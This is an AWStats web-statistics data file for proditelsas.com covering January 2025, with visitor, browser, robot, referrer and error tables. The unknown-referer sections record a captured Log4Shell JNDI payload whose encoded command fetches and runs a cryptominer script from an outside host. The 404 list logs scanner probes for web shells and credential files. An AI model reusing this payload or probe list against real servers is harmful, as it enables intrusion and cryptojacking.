AWSTATS DATA FILE 7.8 (build 20200416)
# If you remove this file, all statistics for date 202501 will be lost/reset.
# Last config file used to build this data file was /home/z1h9uk8mq9i3/tmp/awstats/awstats.proditelsas.com.conf.

# Position (offset in bytes) in this file for beginning of each section for
# direct I/O access. If you made changes somewhere in this file, you should
# also remove completely the MAP section (AWStats will rewrite it at next
# update).
BEGIN_MAP 28
POS_GENERAL 2016                
POS_TIME 2698                
POS_VISITOR 33831               
POS_DAY 66479               
POS_DOMAIN 3608                
POS_LOGIN 4540                
POS_ROBOT 4695                
POS_WORMS 5676                
POS_EMAILSENDER 5807                
POS_EMAILRECEIVER 5950                
POS_SESSION 67371               
POS_SIDER 67583               
POS_FILETYPES 6085                
POS_DOWNLOADS 6398                
POS_OS 6685                
POS_BROWSER 7084                
POS_SCREENSIZE 9976                
POS_UNKNOWNREFERER 10050               
POS_UNKNOWNREFERERBROWSER 11537               
POS_ORIGIN 12406               
POS_SEREFERRALS 12553               
POS_PAGEREFS 12772               
POS_SEARCHWORDS 14852               
POS_KEYWORDS 15034               
POS_MISC 2362                
POS_ERRORS 15125               
POS_CLUSTER 4396                
POS_SIDER_404 15304               
END_MAP

# LastLine    = Date of last record processed - Last record line number in last log - Last record offset in last log - Last record signature value
# FirstTime   = Date of first visit for history file
# LastTime    = Date of last visit for history file
# LastUpdate  = Date of last update - Nb of parsed records - Nb of parsed old records - Nb of parsed new records - Nb of parsed corrupted - Nb of parsed dropped
# TotalVisits = Number of visits
# TotalUnique = Number of unique visitors
# MonthHostsKnown   = Number of hosts known
# MonthHostsUnKnown = Number of hosts unknown
BEGIN_GENERAL 8
LastLine 20250201003356 200 50086 10753512421830
FirstTime 20250101004531
LastTime 20250131231822
LastUpdate 20250201055934 200 0 199 0 0
TotalVisits 1151                
TotalUnique 827                 
MonthHostsKnown 0                   
MonthHostsUnknown 852                 
END_GENERAL

# Misc ID - Pages - Hits - Bandwidth
BEGIN_MISC 10
PDFSupport 0 0 0
QuickTimeSupport 0 0 0
DirectorSupport 0 0 0
TotalMisc 0 0 0
RealPlayerSupport 0 0 0
JavascriptDisabled 0 0 0
AddToFavourites 0 0 0
JavaEnabled 0 0 0
FlashSupport 0 0 0
WindowsMediaPlayerSupport 0 0 0
END_MISC

# Hour - Pages - Hits - Bandwidth - Not viewed Pages - Not viewed Hits - Not viewed Bandwidth
BEGIN_TIME 24
0 61 61 162136 273 290 278931
1 48 48 189558 62 86 166191
2 75 76 259015 121 173 7684149
3 62 77 2473651 289 331 649696
4 42 58 7473466 55 108 944600
5 81 113 11338285 79 157 1616701
6 123 287 28381950 304 354 608907
7 148 281 27142111 92 153 301256
8 119 308 23938650 70 95 845350
9 58 118 8574695 62 101 1330987
10 226 275 7793407 88 135 730171
11 98 142 7284399 127 175 870235
12 129 317 25814164 122 193 2370037
13 122 189 16837380 111 157 892450
14 95 201 36795641 77 137 1259189
15 123 258 23499960 123 179 931418
16 106 177 22111919 79 115 648523
17 90 230 30355100 98 140 938907
18 121 156 9712351 84 138 576084
19 272 334 25776459 106 145 1744729
20 93 155 5306840 148 209 781958
21 84 99 3804602 81 134 822479
22 63 63 170996 292 324 10143239
23 60 65 223312 70 115 512793
END_TIME

# Domain - Pages - Hits - Bandwidth
# The 25 first Pages must be first (order not required for others)
BEGIN_DOMAIN 49
us 847 1154 65554105
ar 707 1090 40266424
cn 171 177 1161604
ru 159 163 930425
co 123 836 178769698
in 82 110 4775371
jp 61 62 447589
it 44 44 186034
nl 27 27 222124
ca 26 28 77540
fr 21 33 219352
vg 19 19 15371
gb 18 36 2404809
bg 17 18 58987
ua 17 18 382265
be 17 17 17208
eg 16 16 43984
id 14 14 41972
nc 14 14 38486
se 12 12 79162
hn 11 12 275438
cz 11 11 62778
ro 7 7 22273
sc 6 6 16494
bo 5 42 5791238
za 2 2 5498
au 4 4 6691
ir 0 1 19165
sa 1 1 4264
mx 1 15 2281920
eu 1 1 809
mn 4 4 3236
cw 4 21 14264695
rs 2 2 5498
ch 1 15 2281920
hu 2 2 5498
hk 3 3 35622
dk 1 2 4581
cl 1 1 2749
pe 1 15 2281920
br 1 15 2281920
gr 2 2 1618
nz 2 2 5498
de 5 5 15260
ao 1 1 809
il 4 4 23345
vn 1 1 17038
zz 2 2 5498
pa 1 1 4264
END_DOMAIN

# Cluster ID - Pages - Hits - Bandwidth
BEGIN_CLUSTER 0
END_CLUSTER

# Login - Pages - Hits - Bandwidth - Last visit
# The 10 first Pages must be first (order not required for others)
BEGIN_LOGIN 0
END_LOGIN

# Robot ID - Hits - Bandwidth - Last visit - Hits on robots.txt
# The 25 first Hits must be first (order not required for others)
BEGIN_ROBOT 23
Googlebot/ 564 5259226 20250131182635 0
no_user_agent 244 588353 20250131164328 0
bot[\s_+:,\.\;\/\\-] 132 28160035 20250131224833 0
bingbot/ 113 2072120 20250131015318 0
Go\-http\-client/ 64 140753 20250128165837 15
AhrefsBot/ 24 79784 20250129232926 0
link 20 69767 20250129074701 0
BLEXBot/ 16 55234 20250123214558 0
Applebot/ 13 68879 20250130020925 0
spider 12 82619 20250107180723 0
yandex 7 44487 20250127052059 0
curl 6 4045 20250130013647 0
MJ12bot/ 6 26400 20250120223538 0
SemrushBot/ 5 18447 20250131000234 0
Googlebot\-Image/ 5 260790 20250116191141 0
YandexBot/ 3 12792 20250123215326 0
crawl 2 34076 20250129081708 0
facebookexternalhit/ 1 17038 20250122024504 0
Barkrowler 1 1575 20250128021543 0
survey 1 17038 20250101120743 0
YandexImages/ 1 19229 20250107162135 0
DotBot/ 1 17038 20250107000555 0
scanner 1 809 20250130113857 0
END_ROBOT

# Worm ID - Hits - Bandwidth - Last visit
# The 5 first Hits must be first (order not required for others)
BEGIN_WORMS 0
END_WORMS

# EMail - Hits - Bandwidth - Last visit
# The 20 first Hits must be first (order not required for others)
BEGIN_EMAILSENDER 0
END_EMAILSENDER

# EMail - Hits - Bandwidth - Last visit
# The 20 first hits must be first (order not required for others)
BEGIN_EMAILRECEIVER 0
END_EMAILRECEIVER

# Files type - Hits - Bandwidth - Bandwidth without compression - Bandwidth after compression
BEGIN_FILETYPES 13
html 517 2624419 0 0
Unknown 265 437842 0 0
woff 8 348576 0 0
gif 59 27191 0 0
php 1700 6271785 0 0
1166 1 36 0 0
staff 7 252 0 0
css 282 535187 0 0
png 296 137116362 0 0
js 475 5507059 0 0
pdf 17 4430845 0 0
queue 1 1465 0 0
jpg 460 168119028 0 0
END_FILETYPES

# Downloads - Hits - Bandwidth
BEGIN_DOWNLOADS 7
/atencion.pdf 16 0 2972168
/contrato.pdf 13 0 5467693
/ficha%20tecnica.pdf 12 0 5695503
/Decreto%20067.pdf 10 0 92047
/disponibilidad.pdf 10 0 1946109
/Decreto%201524%20de%202002.pdf 8 0 2365370
/ELEMENTOS%20DE%20SEGURIDAD.pdf 4 0 1601776
END_DOWNLOADS

# OS ID - Hits
BEGIN_OS ID - Hits - Pages 23
linux 225 203
androidoreo 16 2
macosx7 12 12
ios_iphone 330 246
macosx15 135 44
unix 1 1
macosx 184 178
android10 559 79
androidnougat 21 5
android 18 4
winnt 8 7
Unknown 206 166
win7 37 37
winxp 4 4
bsdopenbsd 2 2
winlong 1 1
macosx10 12 12
win10 2238 1421
win8.1 3 3
linuxubuntu 57 57
macosx9 3 3
androidmarshmallow 4 0
win8 12 12
END_OS

# Browser ID - Hits - Pages
BEGIN_BROWSER 135
chrome125.0.0.0 32 4
chrome104.0.0.0 2 2
chrome54.0.2046 1 0
edge44 18 18
opera116.0.0.0 741 592
chrome103.0.0.0 3 3
chrome126.0.0.0 6 6
chrome17.0.963.56 12 12
chrome116.0.0.0 17 3
chrome130.0.0.0 18 18
safari16.4 1 1
chrome60.0.3112.90 4 4
firefox120.0 1 1
chrome77.0.3865.90 1 1
firefox101.0 2 2
chrome63.0.3239.111 16 2
safari18.1.1 26 10
mozilla 128 114
chrome59.0.3071.125 21 5
chrome66.0.3359.117 6 6
chrome81.0.2031 1 0
chrome98.0.4758.80 1 1
chrome121.0.0.0 2 1
firefox130.0 4 4
chrome70.0.429 1 0
chrome103.0.5060.66 16 2
chrome132.0.0.0 201 20
chrome125.0.6422.78 30 2
safari13.0.3 221 220
chrome124.0.6367.119 9 9
chrome117.0.0.0 1 1
firefox102.0 1 1
opera54.0.2952.51 4 4
firefox132.0 19 1
chrome125.0.6422.142 30 2
chrome80.0.3987.162 1 1
chrome121.0.6167.160 3 3
chrome67.0.1834 1 0
chrome127.0.6523.4 15 1
chrome57.0.1230 1 1
chrome67.0.898 1 0
chrome53.0.3027.52 1 1
chrome71.0.2623.112 2 2
chrome81.0.4044.129 3 3
chrome57.0.3004.63 1 1
chrome91.0.4472.114 4 4
firefox53.0 1 1
firefox134.0 30 2
firefox115 1 1
chrome108.0.0.0 63 55
chrome83.0.4103.97 1 1
Unknown 65 41
safari16.1 1 1
chrome63.0.3239.132 7 7
chrome78.0.3904.62 2 2
chrome81.0.2001 1 1
chrome109.0.0.0 2 2
safari18.3 15 1
safari5.1.7 1 1
chrome132.0.6834.83 4 0
chrome92.0.4515.159 12 12
chrome88.0.4324.93 25 2
netscape5.0 16 16
opera9.01 2 2
chrome51.0.2704.64 1 1
firefox126.0 1 1
chrome112.0.5615.136 1 1
chrome64.0.2650 1 0
chrome79.0.3945.130 4 4
chrome55.0.3066.84 1 1
chrome101.0.4951.41 1 1
safari 13 1
chrome75.0.2772 1 1
chrome129.0.0.0 12 12
firefox77.0 1 1
chrome44.0.2403.157 2 2
chrome60.0.3112.113 57 57
opera89.0.4447.51 117 117
chrome58.0.3029.110 4 4
chrome66.0.3359.181 4 4
chrome68.0.379 1 1
chrome68.0.3440.84 2 2
chrome101.0.2104 1 0
chrome54.0.1479 1 1
chrome124.0.6367.61 12 12
firefox63.0 1 1
chrome125.0.6422.141 30 2
chrome125.0.6422.143 15 1
chrome114.0.5735.196 16 2
chrome50.0.3068.61 1 1
firefox114.0 174 174
firefox81.0 1 0
opera53.0.2907.106 2 2
chrome118.0.0.0 1 1
chrome100.0.4896.75 5 5
iphone 2 2
chrome47.0.2526.111 1 1
chrome39.0.2171.95 12 12
chrome87.0.1850 1 1
opera80.4.4244.7786 1 1
safari16.5 15 1
chrome103.0.5060.114 1 1
safari17.0 1 1
chrome50.0.3095.109 1 1
chrome128.0.0.0 17 3
safari18.2 51 10
safari16.6.1 12 6
opera115.0.0.0 293 123
chrome28.1.1500.75 12 12
chrome107.0.0.0 3 3
chrome96.0.4664.110 5 5
chrome78.0.3904.108 60 60
firefox125.0 1 1
chrome83.0.4103.61 2 2
chrome88.0.4324.190 2 2
chrome131.0.6778.264 2 0
chrome100.0.4896.127 4 4
chrome87.0.4280.88 3 2
chrome131.0.0.0 725 112
safari15.4 24 24
chrome122.0.0.0 2 2
chrome72.0.2793 1 1
chrome120.0.0.0 3 3
chrome105.0.0.0 1 1
chrome124.0.0.0 16 16
chrome10.0.648.133 2 2
edge13 6 6
chrome79.0 3 3
chrome54.0.2076 1 1
chrome74.0.3729.169 32 32
chrome113.0.0.0 42 28
chrome64.0.501 1 0
chrome54.0.3067.93 1 1
chrome114.0.0.0 362 362
msie7.0 1 1
END_BROWSER

# Screen size - Hits
BEGIN_SCREENSIZE 0
END_SCREENSIZE

# Unknown referer OS - Last visit date
BEGIN_UNKNOWNREFERER 20
python-httpx/0.27.2 20250109163415
Embarcadero_URI_Client/1.0 20250115004635
t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//46.8.226.196:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0ODZ4cXc3eXNYZEt3N1JrVnpUNXRkU2lEdEU2c294VWRZYUdhR0UxR29hQ2R2QkY3clZnNW9NWEw5cEZ4M3JCMVdVQ1pySnZkNkFITUZXaXBlWXQ1ZUZOVXg5cG1HTg==}') 20250105143346
python-requests/2.28.1 20250111064643
python-httpx/0.28.1 20250125141755
panscient.com 20250101144659
python-requests/2.32.3 20250129132403
python-requests/2.22.0 20250116103831
Mozilla/5.0_(compatible;_Dataprovider.com) 20250110213624
Mozilla/5.0 20250104192344
python-requests/2.27.1 20250126035502
Mozilla/5.0_(compatible;_ips-agent) 20250117013818
Mozilla/5.0_(compatible;_SnoopSecInspect/1.1;__https://snoopsec.us.to/) 20250131210654
Mozilla/5.0_(compatible;_CensysInspect/1.1;__https://about.censys.io/) 20250131171038
Mozilla/5.0_AppleWebKit/537.36_(KHTML,_like_Gecko;_compatible;_GoogleOther)_Chrome/132.0.6834.83_Safari/537.36 20250128091058
Mozilla/5.0_zgrab/0.x 20250126195958
Mozilla/5.0_(compatible) 20250131074221
Python/3.11_aiohttp/3.11.11 20250114162025
Python/3.6_aiohttp/3.8.6 20250118001827
Mozilla/5.0_(compatible;_InternetMeasurement/1.0;__https://internet-measurement.com/) 20250129123801
END_UNKNOWNREFERER

# Unknown referer Browser - Last visit date
BEGIN_UNKNOWNREFERERBROWSER 11
python-httpx/0.28.1 20250125141755
panscient.com 20250101144659
python-requests/2.32.3 20250129132403
python-requests/2.22.0 20250116103831
t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//46.8.226.196:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0ODZ4cXc3eXNYZEt3N1JrVnpUNXRkU2lEdEU2c294VWRZYUdhR0UxR29hQ2R2QkY3clZnNW9NWEw5cEZ4M3JCMVdVQ1pySnZkNkFITUZXaXBlWXQ1ZUZOVXg5cG1HTg==}') 20250105143346
python-requests/2.28.1 20250111064643
python-httpx/0.27.2 20250109163415
Embarcadero_URI_Client/1.0 20250115004635
Python/3.11_aiohttp/3.11.11 20250114162025
Python/3.6_aiohttp/3.8.6 20250118001827
python-requests/2.27.1 20250126035502
END_UNKNOWNREFERERBROWSER

# Origin - Pages - Hits 
BEGIN_ORIGIN 6
From0 930 1002
From1 3 3
From2 48 48
From3 269 269
From4 1249 2766
From5 0 0
END_ORIGIN

# Search engine referers ID - Pages - Hits
BEGIN_SEREFERRALS 4
www_google_com_co 3 3
www_google_com 40 40
www_bing_com 4 4
google_com 1 1
END_SEREFERRALS

# External page referers - Pages - Hits
# The 25 first Pages must be first (order not required for others)
BEGIN_PAGEREFS 44
http://181.119.64.150:8080 92 92
http://181.225.72.214:8080 86 86
http://181.119.64.150:8080/actuator/gateway/routes 15 15
http://181.225.72.214:8080/actuator/gateway/routes 15 15
http://181.225.72.214:8080/favicon.ico 5 5
http://181.119.64.150:8080/api/session/properties 3 3
https://l.wl.co 3 3
http://181.119.64.150:8080/favicon.ico 3 3
http://181.119.64.150:8080 3 3
http://181.225.72.214:8080 3 3
http://181.225.72.214:8080/wp-json 2 2
http://181.225.72.214:8080/robots.txt 2 2
http://181.225.72.214:8080/license.txt 2 2
http://181.119.64.150:8080/sitemap.xml 2 2
http://181.225.72.214:8080/api/session/properties 2 2
http://181.119.64.150:8080/robots.txt 2 2
http://181.225.72.214:8080/sitemap.xml 2 2
http://181.225.72.214:8080/WebInterface/ 1 1
http://181.119.64.150:8080/auth1.html 1 1
http://181.225.72.214:8080/showLogin.cc 1 1
http://181.225.72.214:8080/cgi-bin/authLogin.cgi 1 1
http://181.225.72.214:8080/sslvpnLogin.html 1 1
http://181.225.72.214:8080/auth1.html 1 1
http://181.225.72.214:8080/login 1 1
http://181.119.64.150:8080/auth.html 1 1
http://181.119.64.150:8080/api/sonicos/auth 1 1
http://181.225.72.214:8080/js/NewWindow_2_all.js 1 1
http://181.225.72.214:8080/auth.html 1 1
http://181.225.72.214:8080/c/ 1 1
http://181.225.72.214:8080/zabbix/favicon.ico 1 1
http://181.119.64.150:8080/api/sonicos/tfa 1 1
http://181.119.64.150:8080/wp-json 1 1
http://181.225.72.214:8080/partymgr/control/main 1 1
http://181.225.72.214:8080/api/sonicos/tfa 1 1
http://181.225.72.214:8080/webfig/ 1 1
http://181.119.64.150:8080/sslvpnLogin.html 1 1
http://181.225.72.214:8080/owncloud/status.php 1 1
http://181.225.72.214:8080/status.php 1 1
http://181.225.72.214:8080/api/sonicos/auth 1 1
http://181.225.72.214:8080/Telerik.Web.UI.WebResource.axd 1 1
http://181.225.72.214:8080/console 1 1
http://181.119.64.150:8080/c/ 1 1
http://181.225.72.214:8080/static/historypage.js 1 1
http://181.119.64.150:8080/license.txt 1 1
END_PAGEREFS

# Search keyphrases - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_SEARCHWORDS 1
http+//www.proditelsas.com/ 1
END_SEARCHWORDS

# Search keywords - Number of search
# The 25 first number of search must be first (order not required for others)
BEGIN_KEYWORDS 2
//www.proditelsas.com/ 1
http 1
END_KEYWORDS

# Errors - Hits - Bandwidth
BEGIN_ERRORS 9
302 447 1340
206 5 162172
404 2036 0
403 5 180
400 2 56
422 144 428317
201 13 1029
301 22 5352
101 6 0
END_ERRORS

# URL with 404 errors - Hits - Last URL referrer
BEGIN_SIDER_404 595
/colors.php 1 -
/contactenos.php%09%092024-06-18+00:32%09Ready+contact+form+successfully+found%09http://proditelsas.com%09%09%09%09%09 3 -
/wp-content/tmpls.php 1 -
/wp-includes/Text/Diff/Engine/index.php 3 -
/apple-touch-icon.png 4 -
/wp-content/plugins/fix/up.php 2 -
/about.php7 3 -
/wp-admin/cloud.php 3 -
/wp-admin/network/index.php 6 -
/wp-admin/css/colors/index.php 4 -
/css.php 4 -
/modules/mod_simplefileuploadv1.3/elements/Clean.php 1 -
/wp-includes/customize/wp-conflg.php 3 -
/wp-includes/customize/index.php 4 -
/lock.php 1 -
/wp-header.php 1 -
/randkeyword.PhP7 1 -
/wp-admin/wp-add.php 1 http://www.google.com
/sad/about.php 1 -
/bc 28 -
/wp-content/classwithtostring.php 1 -
/wp-content/upgrade-temp-backup/ty.php 3 -
/mah.php 3 -
/chosen.php 5 -
/wp-admin/maint/about.php 3 -
/.well-known/cache-compat.php 3 -
/504.php 1 -
/wp-admin/css/wp-conflg.php 3 -
/wp-includes/html-api/cloud.php 3 -
/system.php 1 -
/wp-includes/rest-api/index.php 1 -
/wp-content/uploads/about.php 1 -
/wp-includes/admin.php 1 -
/css/chosen.php 3 -
/wp-content/plugins/Cache/footer.php 3 -
/upgrade.php 1 -
/wp-content/plugins/index.php 3 -
/worksec.php 1 -
/wp-content/uploads/423_index.php 3 -
/class.php 1 -
/ebs.php7 3 -
/wp-content/wp-login.php 3 -
/ 6 -
/administrator/templates/isis/index.php 1 -
/bitrix/admin/htmleditor2/simple.php 1 -
/wp-admin/css/ 11 binance.com
/wp-includes/assets/index.php 1 -
/wp-admin/js/admin.php 3 -
/pqr/index.php 1 -
/shell.php 3 -
/images/about.php 3 -
/wp-includes/php-compat/content.php 3 -
/modules/mod_simplefileuploadv1.3/elements/filemanager.php 2 -
/wp-includes/product.php 1 -
/.env 3 -
/updates.php 4 -
/wp-content/cong.php 1 -
/wp-admin/user/index.php 1 -
/wp-admin/autoload_classmap.php 3 -
/wp-includes/certificates/index.php 3 -
/wp-includes/Text/index.php 3 -
/public/vendor/laravel-filemanager/js/script.js 1 -
/yanz.php 3 -
/cgi-bin/upfile.php 3 -
/wp-content/themes/plugin.php 3 -
/403.php 4 -
/wp-content/uploads/json.php 3 -
/x/index.php 1 -
/wp-content/plugins/dummyyummy/wp-signup.php 3 -
/wp-admin/user/chosen.php 3 -
/log.php 4 -
/vendor/phpunit/phpunit/phpunit.xsd 7 -
/xl2023.php 1 -
/wp-content/themes/twentytwentytwo/alfa-rex.php 3 -
/wxo.php 1 -
/alfanew2.php7 3 -
/wp-includes/sitemaps/about.php 1 -
/assets/jquery-file-upload/server/php/index.php 1 -
/administrator/templates/isis/error.php 1 -
/reservas/residenciales.php 1 -
/wp-includes/theme-compat/chosen.php 3 -
/cong.php 4 -
/flower.php 1 -
/wp-admin/images/admin.php 1 -
/3m/wp-admin/css/colors/blue/ 1 -
/pqr/open.php 1 -
/admin-post.php 3 -
/mail.php 3 -
/wp-includes/fonts/install.php 3 -
/colour.php 1 -
/templates/atomic/error.php 1 -
/lufix.php 1 -
/.well-known/content.php 3 -
/plugins/elrte/src/elrte.src.html 1 -
/comida/procedimientos.php 1 -
/wp-includes/fonts/index.php 4 -
/functions.php 1 -
/xmlrpc.php 11 -
/include/wp-configs.php 3 -
/wp-includes/Requests/Utility/cc.php 3 -
/tiny.php 1 -
/wp-includes/autoload_classmap.php 3 -
/templates/protostar/error.php 1 -
/images/admin.php 3 -
/modules/mod_simplefileuploadv1.3/elements/udd.php 1 -
/wp-content/json.php 4 -
/defaul.php 1 -
/OLD-UP-ova.php 1 -
/doc.php 4 -
/gecko-new.php 1 -
/wp-includes/wlwmanifest.xml 1 -
/wp-content/plugins/revslider/includes/external/page/index.php 1 -
/wp-admin/css/colors/HsFPDcD.php 1 -
/alfanew.php7 4 -
/wp-includes/css/wp-conflg.php 3 -
/bk/index.php 1 -
/sitemap_index.xml.gz 1 -
/wp-admin/network/admin.php 1 -
/wp-admin/js/about.php 4 -
/wp-cron.php 3 -
/vendor/bin/loader.php 1 -
/wp-includes/ID3/index.php 6 -
/temp/ 1 -
/admin/function.php 3 -
/baxa1.phP8 1 -
/wp-admin/includes/m.php 3 -
/admin/controller/extension/extension/ 11 binance.com
/inc.php 1 -
/wp-mail.php/wp-includes/ID3/rnEPv9.php 3 -
/admin/editor/engine.php 3 -
/Ley%20679%20de%202001.pdf 1 -
/web/wp-includes/wlwmanifest.xml 2 -
/wp.php 9 -
/wp-content/plugins/seoplugins/mar.php 3 -
/.well-known/pki-validation/moon.php 1 -
/wp-includes/js/codemirror/index.php 3 -
/wp-content/themes/seotheme/classwithtostring.php 3 -
/sites/all/libraries/elfinder/connectors/php/connector.php 1 -
/wp-includes/js/index.php 1 -
/install.php 5 -
/a.php 1 -
/news/wp-includes/wlwmanifest.xml 1 -
/blog 1 -
/wp-2019.php 4 -
/wp-admin/network/about.php 1 -
/ws.php 4 -
/wordpress 29 -
/wp-info.php 1 -
/wp-admin/css/colors/blue/ 1 -
/assets/plugins/jquery-file-upload/server/php/include.php 3 -
/main 28 -
/templates/beez5/index.php 1 -
/sitemap.xml 4 -
/22.php 1 -
/wp-content/plugins/shell/noimg.php 2 -
/wp-includes/room.php 1 -
/old 28 -
/templates/beez_20/error.php 1 -
/test/wp-includes/wlwmanifest.xml 2 -
/wp-admin/function.php 3 -
/wp-includes/mah.php 1 -
/backup 28 -
/elp.php 1 -
/templates/beez5/error.php 1 -
/sitemap 1 -
/wp-includes/sodium_compat/src/index.php 3 -
/images/stories/admin-post.php 3 -
/wp-content/plugins/superstorefinder-wp/css/ssf-wp-pop.css 1 -
/wp-content/plugins/wp-file-manager-pro/lib/php/connector.minimal.php 1 -
/wp-includes/css/alfa-rex.php 3 -
/pqr/pqr/pqr/pqr/pqr/pqr/pqr/pqr/pqr/pqr/pqr/pqr/pqr/pqr/img/atencion.jpg 1 http://proditelsas.com/pqr/pqr/pqr/pqr/pqr/pqr/pqr/pqr/pqr/pqr/pqr/pqr/pqr/pqr/corporativo.php
/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Core32.php 1 -
/wp-includes/sodium_compat/index.php 3 -
/wp-content/themes/pridmag/db.php 1 -
/templates/beez3/error.php 1 -
/s.php 1 -
/new.php 1 -
/404.php 4 -
/wp-content/plugins/ubh/up.php 1 -
/2021/wp-includes/wlwmanifest.xml 1 -
/wp-includes/theme-compat/index.php 3 -
/wp-admin/network/wp-conflg.php 3 -
/test.php 1 -
/wp-content/plugins/wp-file-manager/lib/files/ 1 -
/wp-admin/css/index.php 1 -
/wp-includes/customize/muse.php 3 -
/wp-includes/sodium_compat/alfa-rex.php 3 -
/wp-admin/admin.php 1 -
/moon.php 4 -
/about.php 4 -
/cron.php 1 -
/fw.php 3 -
/pqr/pqr/pqr/pqr/pqr/pqr/pqr/pqr/pqr/pqr/pqr/pqr/pqr/img/control.jpg 1 http://proditelsas.com/pqr/pqr/pqr/pqr/pqr/pqr/pqr/pqr/pqr/pqr/pqr/pqr/pqr/medidor.php
/wp-add.php 2 -
/feeds.php 1 -
/wp-includes/Text/about.php 1 -
/images/lmfi2.php 3 -
/.well-known/acme-challenge/index.php 4 -
/xmrlpc.php 6 -
/cgi-bin/wp-login.php 1 -
/customize.php 1 -
/2.php 1 -
/wp-json/wp/v2/users/ 1 -
/wp-includes/html-api/chosen.php 3 -
/wp-sigunq.php 3 -
/cobertura/pqr/factores.php 1 -
/wp-content/ThreeFox_Exploit/index.php 1 -
/cloud.php 4 -
/back.php 1 -
/wp-admin/css/colors/about.php 1 -
/block-bindings.php 1 -
/wp-admin/byp.php 3 -
/wp-content/languages/wp-login.php 1 -
/wp-includes/customize/about.php 1 -
/root.php 1 -
/wp-includes/Requests/Utility/alfa-rex.php 3 -
/wp-includes/Text/Diff/Engine/wp-login.php 3 -
/wp-content/plugins/core-plugin/file-manager.php 3 -
/configs.php 1 -
/hoot.php 3 -
/wp-includes/Text/Diff/Renderer/about.php 3 -
/wp-content/mu-plugins/gecko.php 3 -
/wp-content/uploads/2022/update.php 3 -
/wp-includes/images/about.php 3 -
/images/ 11 binance.com
/wp-admin/update.php 3 -
/wp-content/plugins/include.php 3 www.google.com
/wp-content/themes/digital-download/new.php 1 -
/wp-includes/wp-class.php 1 -
/new 28 -
/wp-admin/css/about.php 1 -
/wp-includes/js/jquery/jquery.js 12 -
/wp-content/themes.php 1 -
/wp-configs.php 1 -
/1337.php 1 -
/wordpress/ 1 -
/wp-admin/css/colors/blue/moon.php 3 -
/ads.txt 8 -
/wp/ 1 -
/aspera/faspex/ 2 -
/wp-content/plugins/wp-file-upload/css/wordpress_file_upload_style.css 1 -
/sftp-config.json 1 -
/wp-content/themes/konzept/includes/uploadify/upload.php 1 -
/wp-content/plugins/Core-Econ/upH.php 2 -
/contactenos.php%09%092024-06-18+00:32%09Ready+contact+form+successfully+found%09http:/proditelsas.com%09%09%09%09%09 1 http://proditelsas.com/contactenos.php%09%092024-06-18+00:32%09Ready+contact+form+successfully+found%09http://proditelsas.com%09%09%09%09%09
/.well-known/pki-validation/about.php 1 -
/templates/beez/index.php 2 -
/wp-includes/php-compat/chosen.php 3 -
/edit.php 5 -
/assets/plugins/elfinder/php/connector.minimal.php 1 -
/wp-content/plugins/wp-file-upload/wp-file-upload.php 2 -
/wp-admin/images/about.php 1 -
/pqr/pqr/pqr/pqr/pqr/pqr/pqr/pqr/pqr/img/control.jpg 1 http://www.proditelsas.com/pqr/pqr/pqr/pqr/pqr/pqr/pqr/pqr/pqr/residenciales.php
/wp-includes/index.php 3 -
/wp-includes/style-engine/about.php 3 -
/sendgrid/.env 1 -
/pqr/view.php 1 -
/site/wp-includes/wlwmanifest.xml 2 -
/radio.php 5 -
/suspencion.php 60 http://181.225.72.214:8080/
/wp-admin/js/index.php 1 -
/favicon.png 2 -
/plugin.php 2 -
/wp-conflg.php 4 -
/wp-content/plugins/wp-heyloyalty/phpunit.xml 1 -
/ajax-actions.php 3 -
/wp-content/index.php 1 -
/files.php 1 -
/pqr/pqr/pqr/pqr/pqr/pqr/pqr/pqr/pqr/pqr/pqr/img/atencion.jpg 1 http://proditelsas.com/pqr/pqr/pqr/pqr/pqr/pqr/pqr/pqr/pqr/pqr/pqr/residenciales.php
/en/index.php 1 -
/wp-includes/Text/wp-login.php 1 -
/wp-admin/wp-conflg.php 3 -
/wp/wp-includes/wlwmanifest.xml 2 -
/feed/ 4 -
/wp-includes/images/smilies/wp-login.php 3 -
/meta.php 1 -
/sites/all/libraries/plupload/examples/upload.php 1 -
/.well-known/acme-challenge/wso112233.php 3 -
/wp-admin/wp-ldd.php 1 http://www.google.com
/2019/wp-includes/wlwmanifest.xml 1 -
/wp-config-sample.php 1 -
/blog/wp-includes/wlwmanifest.xml 2 -
/ini.php 4 -
/upfile.php 3 -
/blog.php 3 -
/wp-content/themes/wp-pridmag/lock.php 3 -
/templates/beez_20/index.php 1 -
/administrator/index.php 1 -
/wp-trackback.php 3 -
/wp-content/plugins/advanced_file_manager_5/php/connector.minimal.php 1 -
/alfanew.php 3 -
/admin/uploads/lv.php 3 -
/ticket/vendor/htmlawed/htmlawed/gel4y.php 1 -
/b.php 1 -
/admin/assets/plugins/elfinder/php/connector.php 1 -
/packed.php 3 -
/wp-content/plugins/WordPressCore/include.php 11 www.google.com
/xleet.php 1 -
/wp-ldd.php 1 http://www.google.com
/wp-blog-header.php 3 -
/alfa-rex2.php7 3 -
/goods.php 2 -
/.well-known/acme-challenge/about.php 1 -
/dropdown.php 5 -
/wp-content/themes/seotheme/mar.php 1 -
/home 28 -
/wp-activate.php 3 -
/.well-known/acme-challenge/upfile.php 1 -
/alfa-rex1.php 1 -
/wp-ver.php 5 www.google.com
/wp-contentt.php 1 -
/wordpress/wp-includes/wlwmanifest.xml 2 -
/wp-admin/maint/index.php 1 -
/wp-includes/link.php 1 -
/hehe.php 1 -
/wp-includes/widgets/include.php 1 -
/randkeyword.php 2 -
/h.php 1 -
/wp-admin/images/wp-login.php 3 -
/wp-includes/Text/Diff/about.php 3 -
/wp-admin/classwithtostring.php 4 -
/wp-includes/images/media/text.php 3 -
/assets/images/about.php 3 -
/avaa.php 3 -
/cobertura/pqr/medidor.php 1 -
